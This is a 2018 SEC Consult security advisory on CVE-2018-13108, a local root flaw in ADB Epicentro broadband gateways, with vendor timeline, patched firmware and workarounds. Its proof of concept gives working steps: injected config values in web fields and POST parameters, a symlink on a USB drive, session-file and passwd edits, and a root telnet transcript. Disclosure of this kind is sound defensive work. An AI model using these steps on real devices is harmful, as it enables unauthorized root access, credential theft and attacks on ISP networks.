ADB Local Root Jailbreak

`SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >  
=======================================================================  
title: Local root jailbreak via network file sharing flaw  
product: All ADB Broadband Gateways / Routers  
(based on Epicentro platform)  
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.  
fixed version: see "Solution" section below  
CVE number: CVE-2018-13108  
impact: critical  
homepage: http://www.adbglobal.com  
found: 2016-06-09  
by: Johannes Greil (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"ADB creates and delivers the right solutions that enable our customers to  
reduce integration and service delivery challenges to increase ARPU and reduce  
churn. We combine ADB know-how and products with those from a number of third  
party industry leaders to deliver complete solutions that benefit from  
collaborative thinking and best in class technologies."  
  
Source: https://www.adbglobal.com/about-adb/  
  
"Founded in 1995, ADB initially focused on developing and marketing software  
for digital TV processors and expanded its business to the design and  
manufacture of digital TV equipment in 1997. The company sold its first set-top  
box in 1997 and since then has been delivering a number of set-top boxes, and  
Gateway devices, together with advanced software platforms. ADB has sold over  
60 million devices worldwide to cable, satellite, IPTV and broadband operators.  
ADB employs over 500 people, of which 70% are in engineering functions."  
  
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast  
  
  
Business recommendation:  
------------------------  
By exploiting the local root vulnerability on affected and unpatched devices  
an attacker is able to gain full access to the device with highest privileges.  
Attackers are able to modify any settings that might have otherwise been  
prohibited by the ISP. It is possible to retrieve all stored user credentials  
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network  
side of the ISP are possible by using the device as a jump host, depending on  
the internal network security measures.  
  
Network security should not depend on the security of independent devices,  
such as modems. An attacker with root access to such a device can enable  
attacks on connected networks, such as administrative networks managed by the  
ISP or other users.  
  
It is highly recommended by SEC Consult to perform a thorough security review  
by security professionals for this platform. It is assumed that further critical  
vulnerabilities exist within the firmware of this device.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)  
Most ADB devices offer USB ports in order for customers to use them for  
printer or file sharing. In the past, ADB devices have suffered from symlink  
attacks e.g. via FTP server functionality which has been fixed in more recent  
firmware versions.  
  
The "Network File Sharing" feature of current ADB devices via USB uses a samba  
daemon which accesses the USB drive with highest access rights and exports the  
network shares with root user permissions. The default and hardcoded setting  
for the samba daemon within the smb.conf on the device has set "wide links =  
no" which normally disallows gaining access to the root file system of the  
device using symlink attacks via a USB drive.  
  
But an attacker is able to exploit both a web GUI input validation and samba  
configuration file parsing problem which makes it possible to access the root  
file system of the device with root access rights via a manipulated USB drive.  
  
The attacker can then edit various system files, e.g. passwd and session  
information of the web server in order to escalate web GUI privileges and  
start a telnet server and gain full system level shell access as root.  
  
  
This is a local attack and not possible via remote access vectors as an  
attacker needs to insert a specially crafted USB drive into the device!  
Usually not even the ISPs themselves have direct root access on ADB devices  
hence this attack is quite problematic for further internal attacks.  
  
It is possible to change network routes and attack networks and systems within  
the internal network of the ISP or add backdoors or sniffers to the device.  
  
  
Furthermore, attackers are able to gain access to all stored credentials,  
such as PPP, wireless, CPE management or VoIP passwords.  
  
  
Proof of concept:  
-----------------  
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)  
The samba configuration file (smb.conf) of the ADB devices has set the  
following default settings. All file system operations will be performed  
by the root user as set in the "force user" / "force group" setting of the  
exported share:  
  
[global]  
netbios name = HOSTNAME  
workgroup = WORKGROUP  
wide links = no  
smb ports = 445 139  
security = share  
guest account = root  
announce version = 5.0  
socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536  
null passwords = yes  
name resolve order = hosts wins bcast  
wins support = yes  
syslog only = yes  
read only = no  
hosts allow = 192.168.1.1/255.255.255.0  
[share]  
path = /mnt/sdb1/.  
read only = false  
force user = root  
force group = root  
guest ok = yes  
  
  
  
An attacker can edit various values such as "netbios name" and "workgroup" via  
the web GUI. The web GUI does some basic filtering and newlines are  
unfortunately not allowed (the samba config file is line-based) hence a  
special bypass has been crafted in order to change the default setting "wide  
links = no" to "wide links = yes". This enables symlinks to the root file  
system.  
  
By using the following netbios name and workgroup, samba can be tricked into  
allowing symlinks to the root file system of the device:  
netbios domain / workgroup = =wide links = yes \ \  
netbios name = wide links = yes \  
  
Relevant HTTP POST parameters:  
&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C  
  
  
According to the manpage of smb.conf, any line ending in a \ is continued by the  
samba parser on the next line. Furthermore, it states that "Only the first  
equals sign in a parameter is significant." - which it seems can be bypassed  
by adding a backslash \. The parser now thinks that the "wide links = yes" has  
been set and omits the hardcoded "wide links = no" which comes further down  
below in the smb.conf file.  
  
  
In order to add those special values within the web GUI a proxy server such as  
burp proxy is needed because of basic input validation on the client side (not  
server side).  
  
  
The USB drive needs to be formatted to ext2 or ext3 which is supported by  
the ADB device. Then create a symlink to the root file system via the  
following command on the attacker's computer:  
ln -s / /path/to/usbdevice/rootfs  
  
After those settings have been changed and the USB drive has been set up,  
the USB drive can be inserted into the ADB device. The USB volume needs to be  
exported (with read/write permissions) as a share via the web GUI. Afterwards  
it can be accessed over the network and the "rootfs" folder example from above  
will give an attacker access to the ADB root file system with "read & write"  
access permissions as root.  
  
Most file systems / partitions on the device are mounted read-only per default,  
but the most important one "/tmp" contains all settings and is mounted writable  
for operations.  
  
  
The defaut user "admin" usually has little access rights during normal  
operations which can be changed by manipulating the session file of the web  
server within /tmp/ui_session_XXX where XXX is the session id of the currently  
logged on user, e.g. change:  
from: access.dboard/settings/management/telnetserver =|> 2001  
to: access.dboard/settings/management/telnetserver =|> 2220  
etc. (or change all entries for maximum access level)  
  
  
This way, an attacker can give himself all/highest access permissions within  
the GUI and change all the settings of the device! Hence the telnet or SSH  
server can be started even though they might have been disabled by the ISP.  
Furthermore, the /tmp/passwd file has to be changed in order to allow root  
access via shell/telnet:  
change: root:*:0:0:root:/root:/bin/ash  
to: root::0:0:root:/root:/bin/ash  
  
Now telnet into the device with root and no password.  
Example of an ADB DV2210 device:  
  
Trying $IP...  
Connected to $IP.  
Escape character is '^]'.  
Login root:  
  
  
BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
___ ___ ___ ___  
|\__\ /\ \ /\ \ /\ \  
|:| | /::\ \ /::\ \ /::\ \  
|:| | /:/\:\ \ /:/\:\ \ /:/\:\ \  
|:|__|__ /::\~\:\ \ /::\~\:\ \ _\:\~\:\ \  
/::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__\  
/:/~~/~ \/__\:\/:/ / \/__\:\/:/ / \:\ \:\ \/__/  
/:/ / \::/ / \::/ / \:\ \:\__\  
\/__/ /:/ / \/__/ \:\/:/ /  
/:/ / \::/ /  
\/__/ \/__/  
..................................................................  
yet another purposeful solution by A D B Broadband  
..................................................................  
root@$hostname:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@$hostname:~#  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following devices & firmware have been tested which were the most recent  
versions at the time of discovery.  
  
The firmware versions depend on the ISP / customer of ADB and may vary!  
  
ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP  
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP  
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP  
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP  
etc.  
  
It has been confirmed by ADB that _all_ their ADB modems / gateways / routers  
based on the Epicentro platform with USB ports and network file sharing  
features are affected by this vulnerability in all firmware versions for all  
their customers (ISPs) at the time of identification of the vulnerability.  
  
  
Vendor contact timeline:  
------------------------  
2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory  
Asking about affected devices / firmware, timeline for hotfix  
Fast initial response from ADB providing requested information  
2016-06-16: Asking about other affected devices  
2016-06-17: Resending previous question due to encryption problems  
2016-07-04: Conference call  
2016-07 - 2017-04: Further coordination, waiting for firmware release,  
implementation & rollout phases for their customers  
2018-07-04: Embargo lifted, public release of security advisory  
  
  
Solution:  
---------  
The firmware versions depend on the ISP / customer of ADB and may vary!  
  
Patch version:  
  
ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP  
ADB DV2210 >= E_5.3.2, firmware version depending on ISP  
ADB VV5522 >= E_8.3.2, firmware version depending on ISP  
ADB VV2220 >= E_9.3.2, firmware version depending on ISP  
  
Centro Business 1 >= 7.12.10  
Centro Business 2 >= 8.06.08  
  
etc.  
  
  
Workaround:  
-----------  
Restrict access to the web interface and only allow trusted users.  
Change any default/weak passwords to strong credentials.  
Don't allow remote access to the web GUI via Internet.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF J. Greil / @2018  
  
`